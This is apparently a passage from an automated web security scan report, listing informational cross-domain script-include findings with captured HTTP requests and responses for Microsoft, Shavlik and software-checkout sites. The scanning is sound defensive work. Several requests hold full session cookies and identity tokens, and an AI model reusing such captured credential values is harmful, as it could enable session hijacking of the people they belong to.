<script type="text/javascript" src="http://www.oppsource.com/wp-content/themes/oppsource3/script/hoverIntent.js"></script>
<script type="text/javascript" src="http://www.oppsource.com/wp-content/themes/oppsource3/script/superfish.js"></script>
...[SNIP]...
21.16. http://learn.shavlik.com/shavlik/mail-list-shavlik-announce.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://learn.shavlik.com
Path:   /shavlik/mail-list-shavlik-announce.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /shavlik/mail-list-shavlik-announce.aspx HTTP/1.1
Host: learn.shavlik.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Fri, 25 Mar 2011 20:58:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.9-2
X-Pingback: http://www.oppsource.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 25 Mar 2011 20:58:53 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache

   <script language = "javascript">
       window.location = 'http://learn.shavlik.com/shavlik/';
   </script>
   <script language = "javascript">
       window.location = 'http://learn.shavlik.com/shavlik/
...[SNIP]...
<link rel='stylesheet' id='A2A_SHARE_SAVE-css' href='http://www.oppsource.com/wp-content/plugins/add-to-any/addtoany.min.css?ver=1.3' type='text/css' media='all' />
<script type='text/javascript' src='http://www.oppsource.com/wp-includes/js/jquery/jquery.js?ver=1.4.2'></script>
<script type='text/javascript' src='http://www.oppsource.com/wp-content/plugins/google-analyticator/external-tracking.min.js?ver=6.1.1'></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www.oppsource.com/wp-content/themes/oppsource3/style/superfish.css" media="screen">
<script type="text/javascript" src="http://www.oppsource.com/wp-content/themes/oppsource3/script/jquery.js"></script>
<script type="text/javascript" src="http://www.oppsource.com/wp-content/themes/oppsource3/script/hoverIntent.js"></script>
<script type="text/javascript" src="http://www.oppsource.com/wp-content/themes/oppsource3/script/superfish.js"></script>
...[SNIP]...
21.17. http://learn.shavlik.com/shavlik/mail-list-shavlik-xml.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://learn.shavlik.com
Path:   /shavlik/mail-list-shavlik-xml.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /shavlik/mail-list-shavlik-xml.aspx HTTP/1.1
Host: learn.shavlik.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Fri, 25 Mar 2011 20:58:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.9-2
X-Pingback: http://www.oppsource.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 25 Mar 2011 20:58:53 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache

   <script language = "javascript">
       window.location = 'http://learn.shavlik.com/shavlik/';
   </script>
   <script language = "javascript">
       window.location = 'http://learn.shavlik.com/shavlik/
...[SNIP]...
<link rel='stylesheet' id='A2A_SHARE_SAVE-css' href='http://www.oppsource.com/wp-content/plugins/add-to-any/addtoany.min.css?ver=1.3' type='text/css' media='all' />
<script type='text/javascript' src='http://www.oppsource.com/wp-includes/js/jquery/jquery.js?ver=1.4.2'></script>
<script type='text/javascript' src='http://www.oppsource.com/wp-content/plugins/google-analyticator/external-tracking.min.js?ver=6.1.1'></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www.oppsource.com/wp-content/themes/oppsource3/style/superfish.css" media="screen">
<script type="text/javascript" src="http://www.oppsource.com/wp-content/themes/oppsource3/script/jquery.js"></script>
<script type="text/javascript" src="http://www.oppsource.com/wp-content/themes/oppsource3/script/hoverIntent.js"></script>
<script type="text/javascript" src="http://www.oppsource.com/wp-content/themes/oppsource3/script/superfish.js"></script>
...[SNIP]...
21.18. http://office.microsoft.com/en-us/sharepoint-workspace/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://office.microsoft.com
Path:   /en-us/sharepoint-workspace/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en-us/sharepoint-workspace/ HTTP/1.1
Host: office.microsoft.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Teams/tabid/55/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=688642bf9d16e14b952901540959fda0&HASH=bf42&LV=20112&V=3; MUID=FA3AE6176FAC4414AD6FC26C726B4B15; __unam=289c965-12e721b8405-5ba8ac9c-2; _opt_vi_LECG2UZC=70FF57B5-618B-4C89-A6E0-AEEFB08346CB; awsuserguid=guid=555d7aa3-a6f7-4e86-8d0a-2b83cddf17e8; _DetectCookies=Y; ul=1; WT_NVR=0=/:1=en-us:2=en-us/sharepoint-workspace|en-us/sharepoint-designer-help; R=200027254-3/8/2011 14:53:52; _opt_vi_06F86FDK=742B89EE-F086-4032-9920-451B209CBC09; msdn=L=1033; WT_NVR_RU=0=technet|msdn:1=:2=; _opt_vi_DANG4OLL=49D92CA5-D4F7-41F0-8DD6-1130EED19BA3; _opt_vt_DANG4OLL=202FA024DB; ADS=SN=175A21EF; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1301103723737%7D%2C%22lastinvited%22%3A1301103723737%2C%22userid%22%3A%2213011037237379667073420714586%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; A=I&I=AxUFAAAAAAAABwAADIe+FnxFI293k92k7DipMA!!&CS=126gi^0001A@E0J02hA@E0J; omniID=ue; s_cc=true; s_sq=%5B%5BB%5D%5D; WT_FPC=id=173.193.214.243-1295665472.30133593:lv=1301093020097:ss=1301092848759; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=3f56dd2f-a3a7-46f9-9355-bcc55a4ce532&Microsoft.CreationDate=03/26/2011 01:42:52&Microsoft.LastVisitDate=03/26/2011 01:42:52&Microsoft.NumberOfVisits=1&SessionCookie.Id=D193A9CF69CB420783FEEAA9C80CD6AE; MSID=Microsoft.CreationDate=02/15/2011 21:42:53&Microsoft.LastVisitDate=03/26/2011 01:42:52&Microsoft.VisitStartDate=03/26/2011 01:42:52&Microsoft.CookieId=cdefcdbc-cd58-426e-a2b9-6d4d032c5554&Microsoft.TokenId=0242265b-d73d-484f-a494-b6344e553cef&Microsoft.NumberOfVisits=24&Microsoft.IdentityToken=plYFWp/Sav9RboFYJDENknWK0M3HKGRxExSO3ZthrhvxePoaRD543/4jCDtpABDhXvGu6hYw2p7w2OmmFcnnIATCsqP2cDLpwOaak2MSqpcwaZgium6WkbxRI/3lfq0Gws5gcoTO900VpbrWwnZWkk0h7DvuOUy8fvvcOIGUata8oggRE3IuQrAHBEdOSC/VqwuxZuA8KPU+oVMW2WeVUbt/xABiD8cXjH/eMrCCuxuZz35IbR8vQoULMMLVcABNmxQVsXvFb9OdB+JXJYi7RA0KQqL3iTcg1W/EF1rgR0gVqEcUWJN4qVllIbUGiU8N0wicUcjkNMpnYKw6LUumclx6R3aZQ45I51JtrotJDDVuP0DWwWnW13onH24nmUTXBZBOheXFYzynksZs2l8NLvKjXhpdbbc9j9a1dbb4rMVVXHpY30MRfbCM47a1gnmlVVOW+qUz6A30GY5CvEOLiGN25+nvYeNS7r4egZVUUXGtCCTuwHLaMByKYLNBjzcYx+KFLbPw3vUTZZB9kkHuQTlG3YCkF73XUqeC+mr8Xi8=&Microsoft.MicrosoftId=0189-2123-7087-5274&Microsoft.CookieFirstVisit=1; MS0=2a3c4c9fe97247d48c9a5163057b9a69

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Wed, 01 Jan 1997 12:00:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
P3P: CP="ADM CAO CONi COR CUR DEV DSP IND OTRi OUR PSA PUBi STA STP"
SPRequestGuid: ccda36ed-7165-4810-be74-2cc0efb6874a
X-SharePointHealthScore: 0
X-AspNet-Version: 2.0.50727
X-UA-Compatible: IE=8
X-LLCC: en-US
X-Machine: SN1REN106
X-Powered-By: ASP.NET
MicrosoftSharePointTeamServices: 14.0.0.4762
Date: Sat, 26 Mar 2011 01:44:33 GMT
Content-Length: 46021


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US">
<head><meta http-equiv="Content-Type" content="text/html; chars
...[SNIP]...
<link id="css-content" href="http://officeimg.vo.msecnd.net/en-us/files/156/550/HX010151526.css?b=5553%2E4000" rel="stylesheet" /><script id="AjaxClientLibrary" src="http://officeimg.vo.msecnd.net/_layouts/MicrosoftAjax.js?b=5553%2E4000" type="text/javascript"></script><script id="jquerystcjs" src="http://officeimg.vo.msecnd.net/_layouts/jquery.js?b=5553%2E4000" type="text/javascript"></script>
...[SNIP]...
</script><script id="oostcjs" src="http://officeimg.vo.msecnd.net/_layouts/oo.js?b=5553%2E4000" type="text/javascript"></script>
...[SNIP]...
21.19. https://secure.avangate.com/order/cart.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.avangate.com
Path:   /order/cart.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /order/cart.php?PRODS=1523013&QTY=1 HTTP/1.1
Host: secure.avangate.com
Connection: keep-alive
Referer: http://www.fast-report.com/bitrix/redirect3.php?GOTO=https%3A%2F%2Fsecure.avangate.com%2Forder%2Fcart.php%3FPRODS%3D1523013%26QTY%3D1%26GID%3DBITRIX_SM.NzAwMjg4MC40NjE5NjY3Lk4wLi4uZW4%3D
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Avangate
Date: Sat, 26 Mar 2011 17:12:07 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Vary: Accept-Encoding
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 29819


<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
   <script type="text/javascript" language="JavaScript">
       if (window != top) {
           top.location.href = location.href;

...[SNIP]...
<!-- TEST -->
<script type="text/javascript" language="javascript" src="https://3619-avangate.voxcdn.com/content/static/js/order/73f82f37d8558c1a5d62879d208944bf/20110218151117.js?20110218151127"></script>
...[SNIP]...
21.20. https://secure.avangate.com/order/checkout.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.avangate.com
Path:   /order/checkout.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /order/checkout.php?CART_ID=28d9066c6ec8a32ef621f59af8052e03 HTTP/1.1
Host: secure.avangate.com
Connection: keep-alive
Referer: https://secure.avangate.com/order/cart.php?PRODS=1523013&QTY=1
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=dteebjh09n3gl94ubf15q229d7jcnclm; GKD=%95%DB%CE%9F%A1%CF%AEt%9D%B9%8E%C9%B1%C2%9C%9A%91%AB%85q%A2%CB%B4%E4%A0%BC%91%AA%91%83%96%CE%B0%D5%B3%CF%90%88%9A%A9%96%B5%AC%A8

Response

HTTP/1.1 200 OK
Server: Avangate
Date: Sat, 26 Mar 2011 17:12:24 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Vary: Accept-Encoding
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 82609


<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
   <script type="text/javascript" language="JavaScript">
       if (window != top) {
           top.location.href = location.href;

...[SNIP]...
<!-- TEST -->
<script type="text/javascript" language="javascript" src="https://3619-avangate.voxcdn.com/content/static/js/order/73f82f37d8558c1a5d62879d208944bf/20110218151117.js?20110218151127"></script>
...[SNIP]...
21.21. https://secure.shareit.com/shareit/checkout.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.shareit.com
Path:   /shareit/checkout.html

Issue detail

The response dynamically includes the following script from another domain:

Request

POST /shareit/checkout.html?sessionid=1875107339&random=81d9c2f56ca1d5d469974f8d6edb7406&prno=1 HTTP/1.1
Host: secure.shareit.com
Connection: keep-alive
Referer: https://secure.shareit.com/shareit/checkout.html?PRODUCT[300261966]=1&HADD[300261966][ADDITIONAL1]=BITRIX_SM.NzAwMjg4MC40NjE5NjY3Lk4wLi4uZW4%3D&hidecoupon=1
Content-Length: 371
Cache-Control: max-age=0
Origin: https://secure.shareit.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerp-dc5-e5-moonlight-sol-01=1023542538.20480.0000

DELIVERY%5B0%5D=EML&WPRODUCTS%5B0%5D=1&MPRODUCT_ID=&RE_USERNAME=&RE_PASSWORD=&REG_NAME_RADIO=NAME&COMPANY=&SALUTATION=&FIRSTNAME=&LASTNAME=&D_STREET1=&D_STREET2=&D_CITY=&D_STATE_ID=&D_POSTALCODE=&D_CO
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 17:12:26 GMT
Server: Apache
P3P: policyref="https://secure.element5.com/w3c/p3p.xml", CP="CAO DSP COR ADMo PSA CONo HIS OUR SAMo UNRo LEG UNI"
Keep-Alive: timeout=5, max=5000
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 69671

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Fast Reports Inc. - Buy</title>
<style type="text/css">
<!--
/*Hauptelemente*/
body
{
font-family :
...[SNIP]...
ENT="With ShareIt! shareware and software developers can sell their products worldwide on the Internet, shareware and software buyers can browse the comprehensive catalog of more than 5000 titles.">


<script src="https://a248.e.akamai.net/f/248/5462/2d/images.element5.com/shareit/images/e5_main.js" type="javascript"></script>
...[SNIP]...
21.22. http://technet.microsoft.com/en-us/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://technet.microsoft.com
Path:   /en-us/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /en-us/ HTTP/1.1
Host: technet.microsoft.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=688642bf9d16e14b952901540959fda0&HASH=bf42&LV=20112&V=3; MUID=FA3AE6176FAC4414AD6FC26C726B4B15; BPFC=:en:; A=I&I=AxUFAAAAAAAABwAADIe+FnxFI293k92k7DipMA!!&CS=126gi600017030E02h7030E; WT_NVR=0=/:1=en-us:2=en-us/security|en-us/subscriptions|en-us/evalcenter:3=en-us/subscriptions/downloads; CommunityServer-UserCookie2101=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Tue%2c+01+Mar+2011+15%3a49%3a43+GMT; __unam=289c965-12e721b8405-5ba8ac9c-2; _opt_vi_LECG2UZC=70FF57B5-618B-4C89-A6E0-AEEFB08346CB; R=200027254-3/8/2011 14:53:52; _opt_vi_06F86FDK=742B89EE-F086-4032-9920-451B209CBC09; msdn=L=1033; omniID=ue; WT_NVR_RU=0=technet|msdn:1=:2=; MSID=Microsoft.CreationDate=02/15/2011 21:42:53&Microsoft.LastVisitDate=03/26/2011 00:57:21&Microsoft.VisitStartDate=03/26/2011 00:57:21&Microsoft.CookieId=cdefcdbc-cd58-426e-a2b9-6d4d032c5554&Microsoft.TokenId=0242265b-d73d-484f-a494-b6344e553cef&Microsoft.NumberOfVisits=23&Microsoft.IdentityToken=plYFWp/Sav9RboFYJDENknWK0M3HKGRxExSO3ZthrhvxePoaRD543/4jCDtpABDhXvGu6hYw2p7w2OmmFcnnIATCsqP2cDLpwOaak2MSqpcwaZgium6WkbxRI/3lfq0Gws5gcoTO900VpbrWwnZWkk0h7DvuOUy8fvvcOIGUata8oggRE3IuQrAHBEdOSC/VqwuxZuA8KPU+oVMW2WeVUbt/xABiD8cXjH/eMrCCuxuZz35IbR8vQoULMMLVcABNmxQVsXvFb9OdB+JXJYi7RA0KQqL3iTcg1W/EF1rgR0gVqEcUWJN4qVllIbUGiU8N0wicUcjkNMpnYKw6LUumclx6R3aZQ45I51JtrotJDDVuP0DWwWnW13onH24nmUTXBZBOheXFYzynksZs2l8NLvKjXhpdbbc9j9a1dbb4rMVVXHpY30MRfbCM47a1gnmlVVOW+qUz6A30GY5CvEOLiGN25+nvYeNS7r4egZVUUXGtCCTuwHLaMByKYLNBjzcYx+KFLbPw3vUTZZB9kkHuQTlG3YCkF73XUqeC+mr8Xi8=&Microsoft.MicrosoftId=0189-2123-7087-5274&Microsoft.CookieFirstVisit=1; WT_FPC=id=173.193.214.243-1295665472.30133593:lv=1301090290290:ss=1301090290290; _opt_vi_DANG4OLL=49D92CA5-D4F7-41F0-8DD6-1130EED19BA3; _opt_vt_DANG4OLL=202FA024DB; Sto.UserLocale=en-us; ADS=SN=175A21EF

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 33988
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-AspNetMvc-Version: 3.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 26 Mar 2011 01:39:59 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
</script><script type="text/javascript" src="http://Ads1.msn.com/library/dap.js"></script>
...[SNIP]...
21.23. http://technet.microsoft.com/en-us/security/cc261624  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://technet.microsoft.com
Path:   /en-us/security/cc261624

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /en-us/security/cc261624 HTTP/1.1
Host: technet.microsoft.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=688642bf9d16e14b952901540959fda0&HASH=bf42&LV=20112&V=3; MUID=FA3AE6176FAC4414AD6FC26C726B4B15; BPFC=:en:; CommunityServer-UserCookie2101=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Tue%2c+01+Mar+2011+15%3a49%3a43+GMT; __unam=289c965-12e721b8405-5ba8ac9c-2; _opt_vi_LECG2UZC=70FF57B5-618B-4C89-A6E0-AEEFB08346CB; R=200027254-3/8/2011 14:53:52; _opt_vi_06F86FDK=742B89EE-F086-4032-9920-451B209CBC09; msdn=L=1033; WT_NVR_RU=0=technet|msdn:1=:2=; MSID=Microsoft.CreationDate=02/15/2011 21:42:53&Microsoft.LastVisitDate=03/26/2011 00:57:21&Microsoft.VisitStartDate=03/26/2011 00:57:21&Microsoft.CookieId=cdefcdbc-cd58-426e-a2b9-6d4d032c5554&Microsoft.TokenId=0242265b-d73d-484f-a494-b6344e553cef&Microsoft.NumberOfVisits=23&Microsoft.IdentityToken=plYFWp/Sav9RboFYJDENknWK0M3HKGRxExSO3ZthrhvxePoaRD543/4jCDtpABDhXvGu6hYw2p7w2OmmFcnnIATCsqP2cDLpwOaak2MSqpcwaZgium6WkbxRI/3lfq0Gws5gcoTO900VpbrWwnZWkk0h7DvuOUy8fvvcOIGUata8oggRE3IuQrAHBEdOSC/VqwuxZuA8KPU+oVMW2WeVUbt/xABiD8cXjH/eMrCCuxuZz35IbR8vQoULMMLVcABNmxQVsXvFb9OdB+JXJYi7RA0KQqL3iTcg1W/EF1rgR0gVqEcUWJN4qVllIbUGiU8N0wicUcjkNMpnYKw6LUumclx6R3aZQ45I51JtrotJDDVuP0DWwWnW13onH24nmUTXBZBOheXFYzynksZs2l8NLvKjXhpdbbc9j9a1dbb4rMVVXHpY30MRfbCM47a1gnmlVVOW+qUz6A30GY5CvEOLiGN25+nvYeNS7r4egZVUUXGtCCTuwHLaMByKYLNBjzcYx+KFLbPw3vUTZZB9kkHuQTlG3YCkF73XUqeC+mr8Xi8=&Microsoft.MicrosoftId=0189-2123-7087-5274&Microsoft.CookieFirstVisit=1; _opt_vi_DANG4OLL=49D92CA5-D4F7-41F0-8DD6-1130EED19BA3; _opt_vt_DANG4OLL=202FA024DB; ADS=SN=175A21EF; WT_NVR=0=/:1=en-us:2=en-us/security|en-us/subscriptions|en-us/evalcenter|en-us/magazine:3=en-us/subscriptions/downloads; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1301103723737%7D%2C%22lastinvited%22%3A1301103723737%2C%22userid%22%3A%2213011037237379667073420714586%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=2a3c4c9fe97247d48c9a5163057b9a69; A=I&I=AxUFAAAAAAAABwAADIe+FnxFI293k92k7DipMA!!&CS=126gi]0001@@E0I02h@@E0I; WT_FPC=id=173.193.214.243-1295665472.30133593:lv=1301092958107:ss=1301092848759; Sto.UserLocale=en-us; omniID=ue; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 16685
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-AspNetMvc-Version: 3.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 26 Mar 2011 01:42:44 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
</script><script type="text/javascript" src="http://Ads1.msn.com/library/dap.js"></script>
...[SNIP]...
21.24. http://technet.microsoft.com/en-us/security/cc308575  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://technet.microsoft.com
Path:   /en-us/security/cc308575

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /en-us/security/cc308575 HTTP/1.1
Host: technet.microsoft.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=688642bf9d16e14b952901540959fda0&HASH=bf42&LV=20112&V=3; MUID=FA3AE6176FAC4414AD6FC26C726B4B15; BPFC=:en:; CommunityServer-UserCookie2101=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Tue%2c+01+Mar+2011+15%3a49%3a43+GMT; __unam=289c965-12e721b8405-5ba8ac9c-2; _opt_vi_LECG2UZC=70FF57B5-618B-4C89-A6E0-AEEFB08346CB; R=200027254-3/8/2011 14:53:52; _opt_vi_06F86FDK=742B89EE-F086-4032-9920-451B209CBC09; msdn=L=1033; WT_NVR_RU=0=technet|msdn:1=:2=; MSID=Microsoft.CreationDate=02/15/2011 21:42:53&Microsoft.LastVisitDate=03/26/2011 00:57:21&Microsoft.VisitStartDate=03/26/2011 00:57:21&Microsoft.CookieId=cdefcdbc-cd58-426e-a2b9-6d4d032c5554&Microsoft.TokenId=0242265b-d73d-484f-a494-b6344e553cef&Microsoft.NumberOfVisits=23&Microsoft.IdentityToken=plYFWp/Sav9RboFYJDENknWK0M3HKGRxExSO3ZthrhvxePoaRD543/4jCDtpABDhXvGu6hYw2p7w2OmmFcnnIATCsqP2cDLpwOaak2MSqpcwaZgium6WkbxRI/3lfq0Gws5gcoTO900VpbrWwnZWkk0h7DvuOUy8fvvcOIGUata8oggRE3IuQrAHBEdOSC/VqwuxZuA8KPU+oVMW2WeVUbt/xABiD8cXjH/eMrCCuxuZz35IbR8vQoULMMLVcABNmxQVsXvFb9OdB+JXJYi7RA0KQqL3iTcg1W/EF1rgR0gVqEcUWJN4qVllIbUGiU8N0wicUcjkNMpnYKw6LUumclx6R3aZQ45I51JtrotJDDVuP0DWwWnW13onH24nmUTXBZBOheXFYzynksZs2l8NLvKjXhpdbbc9j9a1dbb4rMVVXHpY30MRfbCM47a1gnmlVVOW+qUz6A30GY5CvEOLiGN25+nvYeNS7r4egZVUUXGtCCTuwHLaMByKYLNBjzcYx+KFLbPw3vUTZZB9kkHuQTlG3YCkF73XUqeC+mr8Xi8=&Microsoft.MicrosoftId=0189-2123-7087-5274&Microsoft.CookieFirstVisit=1; _opt_vi_DANG4OLL=49D92CA5-D4F7-41F0-8DD6-1130EED19BA3; _opt_vt_DANG4OLL=202FA024DB; ADS=SN=175A21EF; WT_NVR=0=/:1=en-us:2=en-us/security|en-us/subscriptions|en-us/evalcenter|en-us/magazine:3=en-us/subscriptions/downloads; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1301103723737%7D%2C%22lastinvited%22%3A1301103723737%2C%22userid%22%3A%2213011037237379667073420714586%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=2a3c4c9fe97247d48c9a5163057b9a69; A=I&I=AxUFAAAAAAAABwAADIe+FnxFI293k92k7DipMA!!&CS=126gi]0001@@E0I02h@@E0I; Sto.UserLocale=en-us; omniID=ue; s_cc=true; s_sq=%5B%5BB%5D%5D; WT_FPC=id=173.193.214.243-1295665472.30133593:lv=1301093000242:ss=1301092848759

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 44512
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-AspNetMvc-Version: 3.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
